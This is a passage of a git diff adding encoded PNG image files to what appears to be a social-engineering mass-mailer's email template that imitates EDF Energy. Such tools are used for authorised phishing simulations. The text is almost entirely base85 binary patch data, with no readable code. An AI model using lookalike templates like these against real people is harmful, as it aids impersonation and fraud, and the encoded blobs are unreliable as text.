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

literal 0
HcmV?d00001

diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png
new file mode 100644
index 0000000000000000000000000000000000000000..2734ec4276bd435217e8afec5887dc82b6fffb72
GIT binary patch
literal 3015
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
JPDHLkV1l%MoOJ*I

literal 0
HcmV?d00001

diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png
new file mode 100644
index 0000000000000000000000000000000000000000..51ca21042107764771fa4d5de56e0aed06ac9743
GIT binary patch
literal 864
zcmV-m1E2hfP)<h;3K|Lk000e1NJLTq000{R000^Y0ssI2$?CAD0009gNkl<ZcwUv&
zONdZq7>Dua|9)q%v2iL(DHoLmr6d-EigXdtE{Y~COogC<45ATdAxhfCvalPiBq|8Q
zsAYk<?6R?KN^J~-aG?f;8Z;F-bH4Xq;2eag#rYjLynGy<^Pbhw;Ie1A%%lNHRSE#h
zvaqMmZ=QG6menKcRxTJ>G*5&<U|SLZ=!&I#02!b=#Wo?jM=#xF1I|F1QP$tHaR2rP
zZl6B~5(k2=xLXonPZv7|{&gOxIweRX1}LxXeE8{2%OD{DpaFp{C(>QFs|y@}j6osN
z1optBF7ABm@V7sldFQzeMbpLT7VI_>iNRJk14>gJX<9o)k%d}PEqr|B*xt9lqNBkj
zy9rSv3U-33D7Gc~_~4bzTOM2t8K`lF8)^bng=~wycE5S}_lb)J&0O-lqk;mm%8`YJ
zN;Z`~5}tW{^}cPZN;B_nyEtqUMYy$H3!<N}kDWX{w)x)j)b<_cF8ul1#AM^9bsMD-
zf|NurrcK{*%k0?o#Hu3)Mn@K2Un2*Qou(BHJ!OIP*Wa9t$v-YGm_PTk1EZTBTGW;X
z7f~veo>ZGGocQslsFKCCSI;{5(#BWE?jL9(OoQl2F<DY)&QIw3Q@<>@X%0#V;OMc_
zYsTIM=oys_3|~1EI4x`ekn$u5L|-mb_VDnGaD+&tcCx;4=;-?K56J}6Uqsw+-B1)Y
zxSs#@udVw&-TU6>Q>`tP6g`<*sCV8vHwFiE;?#vl#^3+si|?9Rs@e#(^e+lr9$h;U
z`wxD(Vf@hXljkf0jb$S$J&AJ7@Qme)Z;X$Q96$T>1Z2sAYE8)yL0_&<Zd~4!8VMnr
zwnhaa0<cX_vxkSqAG;5l2m}Nn3nUVdaR+d!dxrsK*hywW$p9jB=*5l0vj$<RvG@;?
z!1i<^4AW5&raBZ!IP6OL<*~IZSKQW+c%b2bbU#el76lO4cGLcI;k1xz7L9LNv14=v
zOyL2b`(Jknx;f}(LAP(nI4oTnXAYLvcdgsHekn>a5XOznB|><*E0nnVbW0%#mrOg<
qxG37ub$7k6ZOz=-LnZ|T0QheSt*}#bT_w!`0000<MNUMnLSTXgT#owy

literal 0
HcmV?d00001

diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png
new file mode 100644
index 0000000000000000000000000000000000000000..a4f175112eda5b97f33f822ad17e4d0aeebdcb45
GIT binary patch
literal 3576
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
